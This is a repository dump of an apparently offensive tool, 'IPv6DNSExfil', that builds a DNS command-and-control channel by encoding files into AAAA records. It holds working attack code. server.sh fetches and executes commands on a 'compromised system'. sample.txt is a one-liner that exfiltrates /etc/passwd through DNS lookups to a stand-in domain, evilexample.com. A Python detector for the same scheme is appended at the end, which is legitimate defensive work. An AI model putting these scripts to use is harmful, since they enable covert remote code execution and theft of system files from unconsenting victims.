├── .gitignore
├── README.md
├── file2ipv6.sh
├── sample.txt
└── server.sh

/.gitignore:
--------------------------------------------------------------------------------
.idea
dns.key
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# IPv6DNSExfil

This script will create AAAA records that can be used as a C&C channel.
The output of the file2ipv6.sh script is intended to be piped to nsupdate,
which will then take care of sending the updates to the appropriate
authoritative DNS server.

You will need to configure the correct DNS server in the script, as well as
the zone you want to use for the C&C channel.

To run the script:

```bash
./file2ipv6.sh sample.txt | nsupdate -k dns.key
```

sample.txt is any file that you would like to encode. Typically a simple
text file with a shell command to be executed.
dns.key is the update key for your DNS server. It is optional; whether you
need it depends on your name server configuration.

server.sh contains the oneliner that will execute the command on the compromised system.

More details:
--------------------------------------------------------------------------------

/file2ipv6.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Emit nsupdate commands that encode the input file into a series of AAAA
# records: each record carries a 16-bit sequence counter (starting at 0x2000)
# followed by up to 14 bytes of file data, zero-padded to a full address.
n=2000
echo server 10.128.0.5
echo zone evilexample.com
echo update delete a.evilexample.com AAAA
# xxd emits 14 bytes (28 hex chars) per line; split each line into 4-char hextets
for b in $(xxd -p -c 14 "$1" | sed 's/..../&:/g' | sed 's/:$//'); do
    f=$n:$b
    # a trailing half hextet (2 hex chars) is padded to a full 4
    f=$(echo "$f" | sed 's/:..$/&00/')
    # pad with zero hextets and trim to the 39 chars of a full IPv6 address
    f=$(echo "$f:0000:0000:0000:0000:0000:0000:0000:0000" | head -c39)
    echo update add a.evilexample.com. 10 AAAA "$f"
    n=$((n+1))
done
echo send
--------------------------------------------------------------------------------

/sample.txt:
--------------------------------------------------------------------------------
for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done
--------------------------------------------------------------------------------

/server.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# this script is intended to be run on the compromised server
# CHANGE THE DOMAIN FROM evilexample.com to something you own ;-)

# fetch the AAAA records, order them by the leading counter, drop the counter
# and the colons, decode the hex back to bytes and run the result
`dig +short AAAA a.evilexample.com | sort -n | cut -f2- -d':' | tr -d ':' | xxd -p -c 14 -r`
--------------------------------------------------------------------------------
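A defender-side check for the record layout used above, as an added example that is not part of this repository: given the AAAA records returned for one name (from a resolver log or passive-DNS feed), it tests whether the leading hextets form a sequential counter run and whether the remaining bytes are mostly printable text, and reassembles the carried data for an analyst. The sample records are constructed; `EXFIL_AAAA`, `NORMAL_AAAA` and the function names are assumptions of this example.

```python
import ipaddress
import string

# Constructed sample input (not from the repository): AAAA records for one
# name as a resolver log or passive-DNS feed would show them, in the
# compressed form dig prints. The first set follows the layout used above
# (16-bit counter from 0x2000, then up to 14 data bytes, zero padded); the
# second set is an ordinary host with three addresses.
EXFIL_AAAA = [
    "2002:6563:686f:2062:7965:a00::",
    "2000:6563:686f:2068:656c:6c6f:2077:6f72",
    "2001:6c64:a00::",
]
NORMAL_AAAA = ["2001:db8::1", "2001:db8::2", "2001:db8:0:1::5"]

PRINTABLE = set(string.printable.encode("ascii"))


def counter(addr: str) -> int:
    """Leading hextet, which the scheme uses as a sequence number."""
    return int.from_bytes(ipaddress.IPv6Address(addr).packed[:2], "big")


def payload(addr: str) -> bytes:
    """The 14 bytes after the counter, with the zero padding removed."""
    return ipaddress.IPv6Address(addr).packed[2:].rstrip(b"\x00")


def is_sequential(addrs) -> bool:
    """True when the leading hextets form one unbroken run of counters."""
    ctrs = sorted(counter(a) for a in addrs)
    return len(ctrs) > 1 and ctrs == list(range(ctrs[0], ctrs[0] + len(ctrs)))


def printable_ratio(addrs) -> float:
    """Share of carried bytes that are printable ASCII (a text payload)."""
    data = b"".join(payload(a) for a in addrs)
    return sum(b in PRINTABLE for b in data) / len(data) if data else 0.0


def looks_like_exfil(addrs, min_records=3, min_printable=0.9) -> bool:
    """Flag a record set with sequential counters carrying mostly text."""
    return (len(addrs) >= min_records and is_sequential(addrs)
            and printable_ratio(addrs) >= min_printable)


def reassemble(addrs) -> bytes:
    """Recover the carried data for analysis, ordering records by counter."""
    return b"".join(payload(a) for a in sorted(addrs, key=counter))
```

Because `payload` strips each record's trailing zero bytes (the same effect dig's `::` compression has on the original oneliner), data that genuinely ends in zero bytes is truncated; that is acceptable for triage but not for forensic recovery.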